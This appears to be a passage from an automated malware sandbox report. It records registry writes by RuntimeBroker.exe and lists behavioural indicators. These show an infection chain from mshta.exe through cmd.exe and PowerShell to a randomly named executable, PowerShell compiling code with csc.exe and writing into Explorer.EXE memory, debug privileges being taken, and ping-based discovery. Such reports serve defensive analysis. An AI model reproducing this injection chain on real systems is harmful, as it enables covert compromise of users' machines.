Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c865fe54-cc4c-4a9e-a = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c3e43ce8a127b3a45751a8644b127ec119c7b3068db0714b0bc53272ebb1d13b"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\49a65774-0edc-4bb7-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\49a65774-0edc-4bb7-8 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f4e59fe61bf41d99ba13d95f514beef058bf1f83da5fd246c209903fb304c117"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\49a65774-0edc-4bb7-8 = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86085240-b86f-41da-9	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86085240-b86f-41da-9 = 9dd915e2bef8d901	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b7997b5-efbe-4774-b	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\109ae8b5-93a3-426a-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6804de42-6312-4a0f-b = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86085240-b86f-41da-9 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000005d8f4ae1bef8d90185adece1bef8d90185adece1bef8d901e05c03000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000363734646564373339346535646234663830656536366335306438633037623734336635353738306363666364393564636461353938306532353063616134650000b20009000400efbe4757b90c4757b90c2e000000000000000000000000000000000000000000000000000ffcc300360037003400640065006400370033003900340065003500640062003400660038003000650065003600360063003500300064003800630030003700620037003400330066003500350037003800300063006300660063006400390035006400630064006100350039003800300065003200350030006300610061003400650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36373464656437333934653564623466383065653636633530643863303762373433663535373830636366636439356463646135393830653235306361613465000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a7123931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a7123931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7ae3a2ef-10e7-461b-9	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\674ded7394e5db4f80ee66c50d8c07b743f55780ccfcd95dcda5980e250caa4e"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\109ae8b5-93a3-426a-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000642c48e1bef8d901fbb270e1bef8d901fbb270e1bef8d901b7da02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000633365343363653861313237623361343537353161383634346231323765633131396337623330363864623037313462306263353332373265626231643133620000b20009000400efbe4757b90c4757b90c2e00000000000000000000000000000000000000000000000000ed35de00630033006500340033006300650038006100310032003700620033006100340035003700350031006100380036003400340062003100320037006500630031003100390063003700620033003000360038006400620030003700310034006200300062006300350033003200370032006500620062003100640031003300620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63336534336365386131323762336134353735316138363434623132376563313139633762333036386462303731346230626335333237326562623164313362000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6f23931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6f23931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6804de42-6312-4a0f-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6aadef973c829c9595d6f1e9f353d22c609abd92f4b43d11209e64cfbb138613"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c865fe54-cc4c-4a9e-a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000013f5efe0bef8d90113f5efe0bef8d90113f5efe0bef8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000633365343363653861313237623361343537353161383634346231323765633131396337623330363864623037313462306263353332373265626231643133620000b20009000400efbe4757b90c4757b90c2e00000000000000000000000000000000000000000000000000ed35de00630033006500340033006300650038006100310032003700620033006100340035003700350031006100380036003400340062003100320037006500630031003100390063003700620033003000360038006400620030003700310034006200300062006300350033003200370032006500620062003100640031003300620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63336534336365386131323762336134353735316138363434623132376563313139633762333036386462303731346230626335333237326562623164313362000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6723931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6723931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dda8cd1-5751-4632-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000daa700e1bef8d901daa700e1bef8d901daa700e1bef8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000663465353966653631626634316439396261313364393566353134626565663035386266316638336461356664323436633230393930336662333034633131370000b20009000400efbe4757b90c4757b90c2e000000000000000000000000000000000000000000000000002683cd00660034006500350039006600650036003100620066003400310064003900390062006100310033006400390035006600350031003400620065006500660030003500380062006600310066003800330064006100350066006400320034003600630032003000390039003000330066006200330030003400630031003100370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66346535396665363162663431643939626131336439356635313462656566303538626631663833646135666432343663323039393033666233303463313137000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6923931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6923931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6804de42-6312-4a0f-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c865fe54-cc4c-4a9e-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eed89e20-60e1-430c-a	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b238ada4-b171-4313-8	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\49a65774-0edc-4bb7-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d258a096-c6f3-4110-b = "8324"	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3612	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
3612	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1520	powershell.exe
1520	powershell.exe
3572	OPaUZKCu.exe
3572	OPaUZKCu.exe
1700	powershell.exe
1700	powershell.exe
1700	powershell.exe
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3084	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
1700	powershell.exe
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
3084	Explorer.EXE
1372	cmd.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeShutdownPrivilege	3084	Explorer.EXE
Token: SeCreatePagefilePrivilege	3084	Explorer.EXE
Token: SeShutdownPrivilege	3084	Explorer.EXE
Token: SeCreatePagefilePrivilege	3084	Explorer.EXE
Token: SeShutdownPrivilege	3084	Explorer.EXE
Token: SeCreatePagefilePrivilege	3084	Explorer.EXE
Token: SeShutdownPrivilege	3084	Explorer.EXE
Token: SeCreatePagefilePrivilege	3084	Explorer.EXE
Token: SeShutdownPrivilege	3780	RuntimeBroker.exe
Token: SeShutdownPrivilege	3780	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3084	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3084	Explorer.EXE

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 1736	4392	mshta.exe	86
PID 4392 wrote to memory of 1736	4392	mshta.exe	86
PID 4392 wrote to memory of 1736	4392	mshta.exe	86
PID 1736 wrote to memory of 1520	1736	cmd.exe	88
PID 1736 wrote to memory of 1520	1736	cmd.exe	88
PID 1736 wrote to memory of 1520	1736	cmd.exe	88
PID 1520 wrote to memory of 3572	1520	powershell.exe	95
PID 1520 wrote to memory of 3572	1520	powershell.exe	95
PID 1520 wrote to memory of 3572	1520	powershell.exe	95
PID 1452 wrote to memory of 1700	1452	mshta.exe	104
PID 1452 wrote to memory of 1700	1452	mshta.exe	104
PID 1700 wrote to memory of 2288	1700	powershell.exe	106
PID 1700 wrote to memory of 2288	1700	powershell.exe	106
PID 2288 wrote to memory of 460	2288	csc.exe	107
PID 2288 wrote to memory of 460	2288	csc.exe	107
PID 1700 wrote to memory of 2916	1700	powershell.exe	108
PID 1700 wrote to memory of 2916	1700	powershell.exe	108
PID 2916 wrote to memory of 5024	2916	csc.exe	109
PID 2916 wrote to memory of 5024	2916	csc.exe	109
PID 1700 wrote to memory of 3084	1700	powershell.exe	40
